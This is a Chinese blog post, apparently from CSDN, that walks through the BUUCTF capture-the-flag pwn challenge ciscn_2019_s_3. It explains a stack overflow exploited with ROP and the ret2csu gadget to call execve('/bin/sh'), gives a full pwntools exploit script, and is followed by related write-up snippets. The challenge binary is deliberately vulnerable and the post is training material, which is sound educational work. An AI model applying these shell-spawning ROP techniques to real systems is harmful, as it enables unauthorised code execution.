【BUUCTF - PWN】ciscn_2019_s_3

最新推荐文章于 2024-07-11 16:45:57 发布
最新推荐文章于 2024-07-11 16:45:57 发布
阅读量828 收藏 4
点赞数 1
分类专栏: BUUCTF - PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tqydyqt/article/details/105571460
版权
本文详细解析了利用ROP(Return-Oriented Programming)技术解决栈溢出漏洞的过程,通过分析vuln函数特性,确定了ROP链的构建策略。文章介绍了如何通过gdb调试确定关键地址,利用通用gadget控制参数传递,最终实现/bin/sh的调用以获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

checksec一下,栈溢出

IDA打开看看,main函数内只有一个call vuln

注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address
我们要ROP的话offset只需要0x10

程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可get shell

注意到write会打印0x30个字符,其中前0x20个字符没什么用,接下来8个字符是栈上的一个地址,通过gdb调试可以确定它相对于我们输入的首字符的偏移为0x118,从而确定我们下次输入时写在开头的/bin/sh的地址

由于还需要控制第二个和第三个参数,因此选用通用gadget
r12需要指向存放下一个ROP的地址的代码,在这里可以确定相对于输入开头的偏移为0x50

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)
rn=lambda x:io.recv(x)

io=remote('xxx',xxx)

vuln=0x4004ed
pop_rdi=0x4005a3
pop_regs=0x40059a
mov_call=0x400580
mov_rax=0x4004e2
syscall=0x400517

payload=p64(0)*2+p64(vuln)
sl(payload)
rn(0x20)
binsh=u64(rn(8))-0x118
payload='/bin/sh\0'.encode('utf-8')+p64(0)+p64(pop_regs)+p64(0)*2+p64(binsh+0x50)+p64(0)*3+p64(mov_call)+p64(pop_rdi)+p64(binsh)+p64(mov_rax)+p64(syscall)
sl(payload)

io.interactive()

附件:ciscn_2019_s_3

BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1665
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 524
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 595
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
[BUUCTF]PWN21——ciscn_2019_s_3
mcmuyanga的博客
09-07 1964
[BUUCTF]PWN21——ciscn_2019_s_3 附件 步骤 例行检查,64位,开启了NX保护 试运行的时候回显是一些乱码,直接用ida打开,从main函数开始看 main函数调用了vuln函数 __asm 关键字用于调用内联汇编程序,并且可在 C 或 C++ 语句合法时出现。 我们首先要了解一下64位系统的系统调用 传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号 为 0 ;
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 435
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1436
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1129
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2716
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
日行一PWNciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 898
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 418
64位,开启了NX保护 main函数调用了vuln
BUUCTF ciscn_2019_s_3
最新发布
zwb2603096342的博客
07-11 1414
ret2csu,gdb查找stack,srop的利用
ciscn_2019_s_3
qq_45691294的博客
12-29 2283
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
2019ciscn_s_3
Hyrink的博客
06-07 594
ciscn_s_3的两种解法:SROP & ret2csu详解
pwnciscn_2019_s_3
Nothing
12-14 4724
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1708
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
csicn_2019_s_3
Morphy_Amo的博客
03-06 420
万能gadget、SROP
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值